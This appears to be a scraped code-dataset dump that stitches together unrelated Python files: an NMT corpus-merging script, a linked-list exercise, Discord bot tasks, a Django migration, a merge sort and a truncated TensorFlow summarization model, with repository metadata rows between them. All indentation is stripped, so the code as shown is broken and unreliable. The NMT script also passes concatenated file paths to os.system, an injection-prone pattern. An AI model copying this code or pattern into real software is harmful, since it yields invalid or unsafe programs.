_file_dict = OrderedDict()
for files in _all_files:
if src_search_str in files:
file_name = files.split(sep=src_search_str)
_file_dict[file_name[0]] = 1
if tgt_search_str in files:
file_name = files.split(sep=tgt_search_str)
_file_dict[file_name[0]] = 1
output_file_name = ''
flag = 0
for name in _file_dict:
output_file_name = output_file_name + ("_" if flag > 0 else "") + name
flag = 1
return _file_dict, output_file_name
def assert_check_before(_src_file_address,
_tgt_file_address):
_num_lines_src = sum(1 for _ in open(_src_file_address))
_num_lines_tgt = sum(1 for _ in open(_tgt_file_address))
line_no = 0
for src_line, tgt_line in zip(open(_src_file_address),
open(_tgt_file_address)):
line_no += 1
try:
assert src_line != "" and tgt_line != ""
except AssertionError:
print("Empty line found in {0}, {1} at line {2}.".
format(_src_file_address, _tgt_file_address, line_no))
try:
assert _num_lines_src == _num_lines_tgt
except AssertionError:
print("Before reading dataset testing lines equality.")
print("num_lines_src :", _num_lines_src)
print("num_lines_tgt :", _num_lines_tgt)
print("Total loss :", abs(_num_lines_src - _num_lines_tgt))
raise
return _num_lines_src, _num_lines_tgt
def assert_check_after(_num_lines_src,
_num_lines_tgt,
_dummy_output_file_address_src,
_dummy_output_file_address_tgt,
_tot_num_of_line,
parallel_file=1,
skipped_lines=0):
if parallel_file:
num_lines_src_output = sum(1 for _ in open(_dummy_output_file_address_src))
num_lines_tgt_output = sum(1 for _ in open(_dummy_output_file_address_tgt))
try:
assert num_lines_src_output == num_lines_tgt_output == \
_tot_num_of_line + _num_lines_src - skipped_lines
except AssertionError:
print("Testing after adding lines to output files. (parallel_data=1)")
print("num_lines_src :", _num_lines_src)
print("num_lines_tgt :", _num_lines_tgt)
print("num_lines_src_output :", num_lines_src_output)
print("num_lines_tgt_output :", num_lines_tgt_output)
print("tot_num_of_line :", _tot_num_of_line)
print("_tot_num_of_line + _num_lines_src:", _tot_num_of_line + _num_lines_src)
print("Total loss :", abs(num_lines_src_output - num_lines_tgt_output))
raise
else:
raise Exception("condition for parallel_file == 0 is not implemented in the script")
def assert_check_inside(_dummy_output_file_address_src,
_dummy_output_file_address_tgt,
_tot_num_of_line,
_cnt):
num_line_src = sum(1 for _ in open(_dummy_output_file_address_src))
num_line_tgt = sum(1 for _ in open(_dummy_output_file_address_tgt))
try:
assert (_tot_num_of_line + _cnt) == num_line_src == num_line_tgt
except AssertionError:
print("tot_num_of_line :", _tot_num_of_line)
print("cnt :", _cnt)
print("num_line_src :", num_line_src)
print("num_line_tgt :", num_line_tgt)
raise
# Converts the unicode file to ascii
def unicode_to_ascii(s):
return ''.join(c for c in unicodedata.normalize('NFD', s)
if unicodedata.category(c) != 'Mn')
def refine(par_line):
"""
TODO: If there is any pre-processing needed before accumulating all data
:param par_line: a string that will be refined
:return: ret: the refined string
"""
ret = unicode_to_ascii(par_line)
return ret
def write_lines(_src_file_address,
_tgt_file_address,
_dummy_output_file_address_src,
_dummy_output_file_address_tgt,
_tot_num_of_line,
file_name,
line_id_dict,
read_type="w",
parallel_file=1,
debug=1):
_out_file_ptr_src = open(_dummy_output_file_address_src, read_type)
_out_file_ptr_tgt = open(_dummy_output_file_address_tgt, read_type)
print("\nReading {0} dataset...".format(file_name))
tic = time.time()
cnt = 0
skipped = 0
with open(_src_file_address) as src_file_ptr, \
open(_tgt_file_address) as tgt_file_ptr:
for src_sent, tgt_sent in zip(src_file_ptr, tgt_file_ptr):
src_sent = refine(src_sent)
tgt_sent = refine(tgt_sent)
if parallel_file:
if src_sent not in line_id_dict and tgt_sent not in line_id_dict:
_out_file_ptr_src.write(src_sent)
_out_file_ptr_src.flush()
_out_file_ptr_tgt.write(tgt_sent)
_out_file_ptr_tgt.flush()
cnt += 1
if cnt % 10000 == 0 and debug:
assert_check_inside(_dummy_output_file_address_src,
_dummy_output_file_address_tgt,
_tot_num_of_line,
cnt)
print("Line number :" if cnt <= 10000 else " ", cnt, end="")
sys.stdout.flush()
line_id_dict.add(src_sent)
line_id_dict.add(tgt_sent)
else:
skipped += 1
else:
raise Exception("condition for parallel_file == 0 is not implemented in the script")
assert_check_inside(_dummy_output_file_address_src,
_dummy_output_file_address_tgt,
_tot_num_of_line,
cnt)
print("Line number :" if cnt <= 10000 else " ", cnt, end="")
print("")
toc = time.time()
total_time = round(toc - tic, 3)
print("{0} dataset reading time {1}(s)".format(file_name, total_time))
return line_id_dict, skipped
def create_file_path(dir,
dataset_name,
dataset_type,
src_lang,
tgt_lang,
suffix,
verbose):
nmt_str = '.' + src_lang + '-' + tgt_lang + '.' + suffix
_path = os.path.join(dir, dataset_name)
if verbose == 2:
print("\n\tFile path creation for", suffix, "language")
print("\t", "-" * 50)
print("\t", "current_folder :", dir)
print("\t", "datase folder :", dataset_name)
print("\t", "new address :", _path)
__path = os.path.join(_path, dataset_type)
if verbose == 2:
print("\t", "current_folder :", _path)
print("\t", "dataset_type folder :", dataset_type)
print("\t", "new address :", __path)
___path = os.path.join(__path, dataset_name) + '.' +\
dataset_type + nmt_str
if verbose == 2:
print("\t", "current_folder :", __path)
print("\t", "final address :", ___path)
print("\t", "-" * 50)
return ___path
def create_out_file_address(dataset_types,
out_dir,
parallel_file,
verbose,
src_lang,
tgt_lang):
address_dict = {}
dummy_output_file_name = 'dummy'
if parallel_file:
for dataset_type in dataset_types:
out_dir_dt = os.path.join(out_dir, dataset_type)
os.makedirs(out_dir_dt, exist_ok=True)
if verbose == 2:
print(out_dir_dt, "folder created")
dummy_output_file_address_src = os.path.join(out_dir_dt, dummy_output_file_name) +\
'.' + dataset_type + '.' + src_lang + '-' + \
tgt_lang + '.' + src_lang
dummy_output_file_address_tgt = os.path.join(out_dir_dt, dummy_output_file_name) +\
'.' + dataset_type + '.' + src_lang + '-' + \
tgt_lang + '.' + tgt_lang
address_dict[dataset_type] = (dummy_output_file_address_src, dummy_output_file_address_tgt)
if verbose == 2:
print("src", dataset_type, "set address :", dummy_output_file_address_src)
print("tgt", dataset_type, "set address :", dummy_output_file_address_tgt)
else:
raise Exception("condition for parallel_file == 0 is not implemented in the script")
return address_dict
def read_and_write_test(src_num_of_line,
tgt_num_of_line,
ref_num_of_line,
verbose):
try:
if verbose >= 1:
print("\nREAD and WRITE test: testing if there is any reduction or addition"
"for python read and write.")
assert src_num_of_line == ref_num_of_line == tgt_num_of_line
except AssertionError:
print("src_num_of_line (newly read data) :", src_num_of_line)
print("tgt_num_of_line (newly read data) :", tgt_num_of_line)
print("ref_num_of_line (taken from data_set_accumulation() ) :".
format(ref_num_of_line))
raise
if verbose >= 1:
print("Passes the test.\n")
return 0
def total_num_of_line_test(tot_num_of_line, skipped_dict, read_tot_num_of_line, verbose):
for dataset_type, cnt in tot_num_of_line.items():
try:
if verbose >= 1:
print("\nTesting is sum of total number of train, dev and test is same.")
assert read_tot_num_of_line[dataset_type]-skipped_dict[dataset_type] == cnt
except AssertionError:
print("dataset type :", dataset_type)
print("total number of example (newly read):",
read_tot_num_of_line[dataset_type])
print("total number of example (taken from data_set_accumulation() ):",
cnt)
raise
if verbose >= 1:
print("Passed the test.\n")
return 0
def data_set_accumulation(params):
print("Arg values")
print(params)
print("")
all_files = os.listdir(params.dir)
all_files.sort(key=lambda x: x.lower())
dataset_line = {}
params.restrict = list(map(str, params.restrict.split()))
(file_dict,
output_file_name) = retrieve_file_dict(all_files,
params.src_lang,
params.tgt_lang)
os.makedirs(params.out_dir, exist_ok=True)
if params.verbose == 2:
print(params.out_dir, "folder created")
dataset_types = ['dev', 'test', 'train']
dataset_types.sort() # very important to do dev and test at first then train
print("Accumulating dev, test and then train dataset.")
address_dict = create_out_file_address(dataset_types,
params.out_dir,
params.parallel_file,
params.verbose,
params.src_lang,
params.tgt_lang)
tot_num_of_line = {}
skipped_dict = {}
for dataset_type in dataset_types:
tot_num_of_line[dataset_type] = 0
skipped_dict[dataset_type] = 0
dataset_add_list = []
line_id_dict = set()
for dataset_type in dataset_types:
print("\n\nCREATING `{0}` DATASET ...".format(dataset_type))
read_type_flag = 0
for val in file_dict:
print("\n", "#" * 100, "\n", val, " dataset (", dataset_type, ")", "\n", "#" * 100, sep="")
if val in params.restrict:
print("{0} : is manually restricted to read.\n".format(val))
continue
# create file path
# ./params.dir/[alt/ubuntu/os16/...]/[train/dev/test]/[alt/ubuntu/os16/...].en-ms.en
src_file_address = create_file_path(params.dir,
val,
dataset_type,
params.src_lang,
params.tgt_lang,
params.src_lang,
verbose=params.verbose)
if params.verbose >= 1:
print("\t", "src_file_address :", src_file_address)
if os.path.exists(src_file_address):
tgt_file_address = create_file_path(params.dir,
val,
dataset_type,
params.src_lang,
params.tgt_lang,
params.tgt_lang,
verbose=params.verbose)
if params.verbose >= 1:
print("\t", "tgt_file_address :", tgt_file_address)
dataset_add_list.append((src_file_address, tgt_file_address))
if os.path.exists(tgt_file_address):
num_lines_src, num_lines_tgt = assert_check_before(src_file_address,
tgt_file_address)
file_name = val + '.' + dataset_type
print("\n\tTotal number of line in the file {0}: {1}".format(file_name, num_lines_src))
# Write on the combined output file
read_type = "w" if read_type_flag == 0 else "a"
if params.verbose == 1:
print("\tLines will be {0} in".format("written" if read_type == "w" else "appended"))
print("\t\t", address_dict[dataset_type][0])
print("\t\t", address_dict[dataset_type][1])
(line_id_dict,
skipped) = write_lines(src_file_address,
tgt_file_address,
address_dict[dataset_type][0],
address_dict[dataset_type][1],
tot_num_of_line[dataset_type],
file_name,
line_id_dict,
debug=params.debug,
parallel_file=params.parallel_file,
read_type=read_type)
if params.verbose == 1:
print("Total {0} number of lines skipped from {1}-{2} dataset".
format(skipped, val, dataset_type))
read_type_flag = 1
# Check if all the lines have been successfully added.
assert_check_after(num_lines_src,
num_lines_tgt,
address_dict[dataset_type][0],
address_dict[dataset_type][1],
tot_num_of_line[dataset_type],
parallel_file=params.parallel_file,
skipped_lines=skipped)
tot_num_of_line[dataset_type] += num_lines_src-skipped
dataset_line[file_name] = num_lines_src
skipped_dict[dataset_type] += skipped
print("-" * 100)
else:
print("{0} file exists for src language but not for tgt language".
format(src_file_address))
else:
print("{0} file doesn't contain nmt input file naming convension or doesn't exists.".
format(src_file_address))
return (dataset_types,
tot_num_of_line,
skipped_dict,
dataset_line,
dataset_add_list,
output_file_name)
def reporting_read_write_check(params,
tot_num_of_line,
skipped_dict,
dataset_line,
dataset_add_list,
output_file_name):
print("\nReporting and read&write check started.")
print("*" * 100)
read_tot_num_of_line = {}
if params.parallel_file:
raw_tot_line = 0
for dataset_add in dataset_add_list:
language_pair = '.' + params.src_lang + "-" + params.tgt_lang
file_name = os.path.basename(dataset_add[0]).split(language_pair)[0]
dataset_type = file_name.split(".")[1]
src_num_of_line = sum(1 for _ in open(dataset_add[0]))
tgt_num_of_line = sum(1 for _ in open(dataset_add[1]))
read_and_write_test(src_num_of_line,
tgt_num_of_line,
dataset_line[file_name],
params.verbose)
print("Total {0} lines in {1}".format(src_num_of_line, file_name))
if dataset_type not in read_tot_num_of_line:
read_tot_num_of_line[dataset_type] = src_num_of_line
else:
read_tot_num_of_line[dataset_type] += src_num_of_line
raw_tot_line += src_num_of_line
for k, v in skipped_dict.items():
raw_tot_line -= v
# reading train, dev and test from source and current run's variable.
total_num_of_line_test(tot_num_of_line, skipped_dict, read_tot_num_of_line, params.verbose)
read_tot_num_of_line = {}
raw_tot_line_output = 0
for dataset_type in tot_num_of_line:
src_out_address = os.path.join(
os.path.join(params.out_dir, dataset_type),
'dummy') + '.' + dataset_type + '.' + \
params.src_lang + '-' + params.tgt_lang + '.' + \
params.src_lang
tgt_out_address = os.path.join(
os.path.join(params.out_dir, dataset_type),
'dummy') + '.' + dataset_type + '.' + \
params.src_lang + '-' + params.tgt_lang + '.' + \
params.tgt_lang
src_num_of_line = sum(1 for _ in open(src_out_address))
tgt_num_of_line = sum(1 for _ in open(tgt_out_address))
try:
if params.verbose >= 1:
print("\nTesting if number of line in paraller output dataset is same or not.")
assert src_num_of_line == tgt_num_of_line
except AssertionError:
print("src_num_of_line :", src_num_of_line)
print("tgt_num_of_line :", tgt_num_of_line)
raise
if params.verbose >= 1:
print("Test passed.\n")
read_tot_num_of_line[dataset_type] = src_num_of_line
raw_tot_line_output += src_num_of_line
# reading train, dev and test from source and output data variable.
total_num_of_line_test(tot_num_of_line, {'dev': 0, 'test': 0, 'train': 0}, read_tot_num_of_line, params.verbose)
try:
assert raw_tot_line_output == raw_tot_line
except AssertionError:
print("raw_tot_line_output:", raw_tot_line_output)
print("raw_tot_line:", raw_tot_line)
raise
# Rename the file and print the report.
new_folder = os.path.join(params.out_dir, output_file_name)
os.makedirs(new_folder, exist_ok=True)
if params.verbose == 2:
print("new folder created at :", new_folder)
dataset_final_address = []
for dataset_type in tot_num_of_line:
src_out_address = os.path.join(
os.path.join(params.out_dir, dataset_type),
'dummy') + '.' + dataset_type + '.' + \
params.src_lang + '-' + params.tgt_lang + '.' + \
params.src_lang
tgt_out_address = os.path.join(
os.path.join(params.out_dir, dataset_type),
'dummy') + '.' + dataset_type + '.' + \
params.src_lang + '-' + params.tgt_lang + '.' + \
params.tgt_lang
new_src_out_address = os.path.join(new_folder, dataset_type) + \
'.' + params.src_lang + \
'-' + params.tgt_lang + '.' + \
params.src_lang
new_tgt_out_address = os.path.join(new_folder, dataset_type) + \
'.' + params.src_lang + \
'-' + params.tgt_lang + '.' + \
params.tgt_lang
src_cmd = "cp " + src_out_address + " " + new_src_out_address
tgt_cmd = "cp " + tgt_out_address + " " + new_tgt_out_address
os.system(src_cmd)
os.system(tgt_cmd)
id_set = set()
src_ptr = open(new_src_out_address, "r")
tgt_ptr = open(new_tgt_out_address, "r")
for src_line, tgt_line in zip(src_ptr, tgt_ptr):
id_set.add(src_line)
id_set.add(tgt_line)
dataset_final_address.append(((dataset_type, id_set), (new_src_out_address, new_tgt_out_address)))
no_of_line = sum(1 for _ in open(new_src_out_address))
print(new_src_out_address)
print(new_tgt_out_address)
print("Total number of line in {0} : {1}".format(dataset_type, no_of_line))
print("Calculating number of common lines between dev, test and train.")
for itr1, ((dataset_type1, id_set1), (src_add1, tgt_add1)) in enumerate(dataset_final_address):
for itr2, ((dataset_type2, id_set2), (_, _)) in enumerate(dataset_final_address):
if itr1 == itr2:
continue
src_add1_ptr = open(src_add1, "r")
tgt_add1_ptr = open(tgt_add1, "r")
cnt = 0
for src_add1_line, tgt_add1_line in zip(src_add1_ptr, tgt_add1_ptr):
if src_add1_line in id_set2 or tgt_add1_line in id_set2:
cnt += 1
print("Total {0} number of line common between {1} and {2}.".
format(cnt, dataset_type1, dataset_type2))
#################################################
# Start of the script
# TODO: implement condition for parallel_file==0
#################################################
def main():
params = parser.parse_args()
(dataset_types,
tot_num_of_line,
skipped_dict,
dataset_line,
dataset_add_list,
output_file_name) = data_set_accumulation(params)
reporting_read_write_check(params,
tot_num_of_line,
skipped_dict,
dataset_line,
dataset_add_list,
output_file_name)
if __name__ == "__main__":
main()
| [
"sbmaruf@gmail.com"
] | sbmaruf@gmail.com |
e0292d766565f016aa318a8a0a0ef6b6fb9bd40d | 16af32261c036caf4a6ef99efadd1418e7256b47 | /5.3 Include Linked List.py | 274ab0fad924090bc69d60d8d3510632eced4a72 | [] | no_license | pperorin/Data-Struct | 6dc6dcb0237bd11207e08b38c79e6ce0e3ec5ad8 | 32d44ff1735a93608e1e71e11d60277ea5c712ba | refs/heads/master | 2023-03-28T19:32:11.895582 | 2021-03-14T18:54:40 | 2021-03-14T18:54:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,724 | py | class Node:
def __init__(self, item):
self.item = item
self.next = None
def setNext(self, node):
self.next = node
class LinkedList:
def __init__(self):
self.head = None
self.size = 0 #ไม่มี
def __str__(self):
if self.size == 0:
return 'Empty'
else:
s = ''
cur = self.head
for i in range(self.size - 1):
s = s + str(cur.item) + ' '
cur = cur.next
s += str(self.indexOf(self.size - 1).item)
return s
#function -> remove
def isEmpty(self):
return self.size == 0
def getSize(self):
return self.size
def indexOf(self, index):
if index < self.size:
cur = self.head
for i in range(index):
cur = cur.next
return cur
else:
return 'Out of range'
def addHead(self, newHead):#newHead = itemNode
if self.isEmpty():
self.head = Node(newHead)
else:
tmp = Node(newHead)
tmp.setNext(self.head)
self.head = tmp
self.size += 1
def append(self, newNode):
if self.isEmpty():
self.head = Node(newNode)
else:
cur = self.indexOf(self.size - 1)
cur.setNext(Node(newNode))
self.size += 1
def insert(self, newNode, index):
if index == self.size:
self.append(newNode)
elif index == 0:
self.addHead(newNode)
else:
cur = self.indexOf(index - 1)
tmp = cur.next
cur.setNext(Node(newNode))
cur.next.setNext(tmp)
self.size += 1
def index(self, itemCheck):
cur = self.head
count = 0
while cur is not None:
if cur.item == itemCheck:
return count
else:
count += 1
cur = cur.next
return -1
def search(self, item):
index = self.index(item)
if index == -1:
return 'Not Found'
else:
return 'Found'
def remove(self, index):
if index < self.size and index > 0:
cur = self.indexOf(index - 1)
if cur.next.next is not None:
cur.setNext(cur.next.next)
else:
cur.setNext(None)
self.size -= 1
return 'Success'
elif index < self.size and index == 0:
self.head = self.head.next
self.size -= 1
return 'Success'
else:
return 'Out of Range'
def reverse(self):
s = ''
for i in range(self.size - 1,0,-1):
s = s + str(self.indexOf(i).item) + ' '
s += str(self.indexOf(0).item)
return s
inpt=input('Enter Input (L1,L2) : ').split()
L1 = LinkedList()
L2 = LinkedList()
for i in inpt[0].split('->'):
L1.append(i)
for i in inpt[1].split('->'):
L2.addHead(i)
print('L1 : '+str(L1))
print('L2 : ',end='')
for i in inpt[1].split('->'):
print(i+' ',end='')
print()
print('Merge : '+str(L1)+' '+str(L2)) | [
"zentoa@hotmail.co.th"
] | zentoa@hotmail.co.th |
216030e9904e5756b9d914f34643907bfe0329c2 | 1d8f43fa4a16419ced68d1e56c51cc5dbe36a47d | /src/client/tasks/scheduled_async_tasks.py | 0b7f00e1aa97b2a8d3ba7751fe5455bf83044b75 | [
"MIT"
] | permissive | sebveigli/apex_bot | e6ef4fbd95cf1d55c920d8358f46e1c32c138574 | 8c020d026a02b6072ffd8ace40c38872a3a3160f | refs/heads/master | 2022-12-09T16:41:03.723003 | 2019-06-05T20:28:50 | 2019-06-05T20:28:50 | 176,143,755 | 5 | 1 | MIT | 2022-12-08T05:04:51 | 2019-03-17T18:35:31 | Python | UTF-8 | Python | false | false | 2,736 | py | import asyncio
import logging
import threading
import time
logger = logging.getLogger(__name__)
class ScheduledAsyncTasks():
@staticmethod
async def update_client_presence(client):
from discord import Status, Activity, ActivityType
from db import get_server_db
server_count = 0
while True:
logger.debug("Updating presence on Discord")
server_db = get_server_db()
count = server_db.count()
if count != server_count:
logger.debug("Server count changed, updating presence")
server_count = count
message = "{} server{}".format(count, "" if count == 1 else "s")
activity = Activity(name=message, type=ActivityType.listening)
await client.change_presence(status=Status.dnd, activity=activity)
await asyncio.sleep(60)
@staticmethod
async def update_server_prefix_cache(prefix_cache):
from db import get_server_db
while True:
logger.debug("Updating prefix cache")
server_db = get_server_db()
servers = server_db.get_servers()
for _, server in servers.iterrows():
server_id = server['server']
server_prefix = server['prefix']
if server_id not in prefix_cache or prefix_cache.get(server_id) != server_prefix:
logger.debug("Updating prefix cache for server {} with new prefix {}".format(server_id, server_prefix))
prefix_cache[server_id] = server_prefix
await asyncio.sleep(300)
@staticmethod
async def clear_update_history(apex_player_updater):
"""
To prevent the update table getting too big from all the updates, the bot should periodically
clear the updates for all users (who are not actively playing).
This should run once every hour
"""
from db import get_user_db, get_update_db
while True:
while apex_player_updater.running:
await asyncio.sleep(1)
logger.info("Doing cleanup of update table...")
user_db = get_user_db()
update_db = get_update_db()
users = user_db.get_users()
for _, user in users.iterrows():
if user.get('apex'):
if user['apex'].get('state') == 'offline':
logger.debug("Cleaning up user {}".format(user['user']))
update_db.clear_updates(user['user'])
await asyncio.sleep(3600)
@staticmethod
async def update_tournaments(apex_updater):
pass
| [
"seb.veigli@gmail.com"
] | seb.veigli@gmail.com |
45ffaf4426419e33898e073ea47511d7dd5e942c | 632d417159013940d612f7364c2a7c5c88b52a56 | /esign/esign_app/migrations/0011_auto_20180119_1323.py | 1a72ae50f09c5a75f3a94acd9845c1324ab2f88a | [] | no_license | cityking/esign | e553d6197f383fab0435dec5805f140592e2fdfc | f88279e3b7f5800bd5ad3a0bd95ebf494078da4c | refs/heads/master | 2022-11-02T20:12:54.927931 | 2018-02-09T03:02:37 | 2018-02-09T03:02:37 | 120,849,522 | 0 | 0 | null | 2022-10-20T20:28:59 | 2018-02-09T03:07:20 | Python | UTF-8 | Python | false | false | 968 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2018-01-19 05:23
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('esign_app', '0010_auto_20180119_1322'),
]
operations = [
migrations.AlterField(
model_name='appversion',
name='url',
field=models.CharField(max_length=100, verbose_name='下载地址'),
),
migrations.AlterField(
model_name='myuser',
name='join_date',
field=models.DateTimeField(default=datetime.datetime(2018, 1, 19, 13, 23, 34, 652029), verbose_name='加入时间'),
),
migrations.AlterField(
model_name='sign',
name='create_time',
field=models.DateTimeField(default=datetime.datetime(2018, 1, 19, 13, 23, 34, 654114), verbose_name='创建时间'),
),
]
| [
"cityking@citykingdeMacBook-Air.local"
] | cityking@citykingdeMacBook-Air.local |
3c13a9494db50cdb2c1c7cd79a400736ee486249 | 21aaa5f90d02707194caae5d30ed403527c2480f | /tdmerge.py | c0b03dff9ad496b427c11a8894a2c7cf6520dab7 | [] | no_license | Sharmaraunak/Data-structure-with-python | 3de5d4b14fea6d59dbd67a7f83fe59198e50c168 | 72f26a40e76d739f2d24429583bae101eff16e4e | refs/heads/master | 2020-07-15T11:36:29.460059 | 2019-09-02T18:53:18 | 2019-09-02T18:53:18 | 205,553,142 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,905 | py | '''top down merge-sort is an approach in which we divide the array up until last i.e going down to 1 element while dividing
and then callng merge on arr each single unit one time.
In the mergeSort function:
A array in inputted to be sorted
in other function sort
taken start = 0 and end = len(inputted array)
recurse the array t divide end i.e to one element.
find mid = start+end/2
call the mergerSort function recursively on two halves to divide it further into smaller parts.
now call the merge function with array,start,mid,end
In the merge function:
needs:
1.an extra array with size of start+end
2.2 pointers to point at different halves of array to be merged and 1 for new array
while first pointer is lesser than mid and another is lesser than end
do the comparisons to fill the new array
if left in any one copy whole
put all merged valued in an origial array.
-Raunak Kumar Sharma
'''
#merge function
def merge(input_array,start,mid,end):
arr = []
i,j = start,mid+1
while(i<=mid and j<=end):
print(i,j)
if(input_array[i]<=input_array[j]):
arr.append(input_array[i])
i = i+1
else:
arr.append(input_array[j])
j += 1
while(i<= mid):
arr.append(input_array[i])
i += 1
while(j<=end):
arr.append(input_array[j])
j+=1
i = 0
while start <= end:
input_array[start] = arr[i]
i+=1
start+=1
print(input_array)
def sort(input_array,start,end):
if(start>=end):
return
else:
mid = int((start+end)/2)
sort(input_array,start,mid)
sort(input_array,mid+1,end)
merge(input_array,start,mid,end)
#mergeSort function
def mergeSort(input_array):
start = 0
end = len(input_array)-1
sort(input_array,start,end)
input_array = [6,4,5,3,2,1,7]
mergeSort(input_array)
print(input_array) | [
"sharmaraunak338@gmail.com"
] | sharmaraunak338@gmail.com |
d54eb87aaa650c747b6eee9277a4894af92f7bc3 | c731a6feafa43252c5f7b48362be97e3d90081ae | /gpxster/urls.py | 8114bb66759482b43844c6824abc40454171c09e | [] | no_license | sgarsztka/gpx | d3d268905b67f62c62eb09284127817dea08373b | bd7fb7da134d1398a10e1b684b019e00c8fab6c7 | refs/heads/master | 2023-03-16T09:41:39.340308 | 2021-03-07T18:13:56 | 2021-03-07T18:13:56 | 298,028,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 177 | py | from django.urls import path
from . import views
urlpatterns = [
# path('login',views.Login.as_view(), name='login'),
# path('',views.Index.as_view(), name='index')
]
| [
"sbl86al.o@gmail.com"
] | sbl86al.o@gmail.com |
30c6eb75e4a08899cecb9c4a70cb6d59442c7695 | 0cfefe9f94e8c2a963872459d24876f55bc908aa | /model_docsum.py | 0ed50a44994d876e46a757bd50fe3872411dd6a8 | [
"BSD-3-Clause"
] | permissive | wjddn803/TeamAlpha | 7b040821e335d1416d60f82b7e62600052a6063f | ea270f80eb78561048f0d39a0ad30e5be10c79c5 | refs/heads/master | 2020-05-03T19:39:56.414555 | 2019-05-07T03:23:02 | 2019-05-07T03:23:02 | 178,788,178 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 52,046 | py | ####################################
# Author: Shashi Narayan
# Date: September 2016
# Project: Document Summarization
# H2020 Summa Project
####################################
"""
Document Summarization Modules and Models
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow.python.ops import variable_scope
import tensorflow.contrib.seq2seq as seq2seq
#from tensorflow.python.ops import seq2seq
from tensorflow.python.ops import math_ops
# from tf.nn import variable_scope
from my_flags import FLAGS
from model_utils import *
### Various types of extractor
def sentence_extractor_nonseqrnn_noatt(sents_ext, encoder_state):
"""Implements Sentence Extractor: No attention and non-sequential RNN
Args:
sents_ext: Embedding of sentences to label for extraction
encoder_state: encoder_state
Returns:
extractor output and logits
"""
# Define Variables
weight = variable_on_cpu('weight', [FLAGS.size, FLAGS.target_label_size], tf.random_normal_initializer())
bias = variable_on_cpu('bias', [FLAGS.target_label_size], tf.random_normal_initializer())
# Get RNN output
rnn_extractor_output, _ = simple_rnn(sents_ext, initial_state=encoder_state)
with variable_scope.variable_scope("Reshape-Out"):
rnn_extractor_output = reshape_list2tensor(rnn_extractor_output, FLAGS.max_doc_length, FLAGS.size)
# Get Final logits without softmax
extractor_output_forlogits = tf.reshape(rnn_extractor_output, [-1, FLAGS.size])
logits = tf.matmul(extractor_output_forlogits, weight) + bias
# logits: [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
logits = tf.reshape(logits, [-1, FLAGS.max_doc_length, FLAGS.target_label_size])
return rnn_extractor_output, logits
def sentence_extractor_nonseqrnn_titimgatt(sents_ext, encoder_state, titleimages):
"""Implements Sentence Extractor: Non-sequential RNN with attention over title-images
Args:
sents_ext: Embedding of sentences to label for extraction
encoder_state: encoder_state
titleimages: Embeddings of title and images in the document
Returns:
extractor output and logits
"""
# Define Variables
weight = variable_on_cpu('weight', [FLAGS.size, FLAGS.target_label_size], tf.random_normal_initializer())
bias = variable_on_cpu('bias', [FLAGS.target_label_size], tf.random_normal_initializer())
# Get RNN output
rnn_extractor_output, _ = simple_attentional_rnn(sents_ext, titleimages, initial_state=encoder_state)
with variable_scope.variable_scope("Reshape-Out"):
rnn_extractor_output = reshape_list2tensor(rnn_extractor_output, FLAGS.max_doc_length, FLAGS.size)
# Get Final logits without softmax
extractor_output_forlogits = tf.reshape(rnn_extractor_output, [-1, FLAGS.size])
logits = tf.matmul(extractor_output_forlogits, weight) + bias
# logits: [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
logits = tf.reshape(logits, [-1, FLAGS.max_doc_length, FLAGS.target_label_size])
return rnn_extractor_output, logits
def sentence_extractor_seqrnn_docatt(sents_ext, encoder_outputs, encoder_state, sents_labels):
"""Implements Sentence Extractor: Sequential RNN with attention over sentences during encoding
Args:
sents_ext: Embedding of sentences to label for extraction
encoder_outputs, encoder_state
sents_labels: Gold sent labels for training
Returns:
extractor output and logits
"""
# Define MLP Variables
weights = {
'h1': variable_on_cpu('weight_1', [2*FLAGS.size, FLAGS.size], tf.random_normal_initializer()),
'h2': variable_on_cpu('weight_2', [FLAGS.size, FLAGS.size], tf.random_normal_initializer()),
'out': variable_on_cpu('weight_out', [FLAGS.size, FLAGS.target_label_size], tf.random_normal_initializer())
}
biases = {
'b1': variable_on_cpu('bias_1', [FLAGS.size], tf.random_normal_initializer()),
'b2': variable_on_cpu('bias_2', [FLAGS.size], tf.random_normal_initializer()),
'out': variable_on_cpu('bias_out', [FLAGS.target_label_size], tf.random_normal_initializer())
}
# Shift sents_ext for RNN
with variable_scope.variable_scope("Shift-SentExt"):
# Create embeddings for special symbol (lets assume all 0) and put in the front by shifting by one
special_tensor = tf.zeros_like(sents_ext[0]) # tf.ones_like(sents_ext[0])
sents_ext_shifted = [special_tensor] + sents_ext[:-1]
# Reshape sents_labels for RNN (Only used for cross entropy training)
with variable_scope.variable_scope("Reshape-Label"):
# only used for training
sents_labels = reshape_tensor2list(sents_labels, FLAGS.max_doc_length, FLAGS.target_label_size)
# Define Sequential Decoder
extractor_outputs, logits = jporg_attentional_seqrnn_decoder(sents_ext_shifted, encoder_outputs, encoder_state, sents_labels, weights, biases)
# Final logits without softmax
with variable_scope.variable_scope("Reshape-Out"):
logits = reshape_list2tensor(logits, FLAGS.max_doc_length, FLAGS.target_label_size)
extractor_outputs = reshape_list2tensor(extractor_outputs, FLAGS.max_doc_length, 2*FLAGS.size)
return extractor_outputs, logits
def policy_network(vocab_embed_variable, document_placeholder, label_placeholder):
"""Build the policy core network.
Args:
vocab_embed_variable: [vocab_size, FLAGS.wordembed_size], embeddings without PAD and UNK
document_placeholder: [None,(FLAGS.max_doc_length + FLAGS.max_title_length + FLAGS.max_image_length), FLAGS.max_sent_length]
label_placeholder: Gold label [None, FLAGS.max_doc_length, FLAGS.target_label_size], only used during cross entropy training of JP's model.
Returns:
Outputs of sentence extractor and logits without softmax
"""
with tf.variable_scope('PolicyNetwork') as scope:
### Full Word embedding Lookup Variable
# PADDING embedding non-trainable
pad_embed_variable = variable_on_cpu("pad_embed", [1, FLAGS.wordembed_size], tf.constant_initializer(0), trainable=False)
# UNK embedding trainable
unk_embed_variable = variable_on_cpu("unk_embed", [1, FLAGS.wordembed_size], tf.constant_initializer(0), trainable=True)
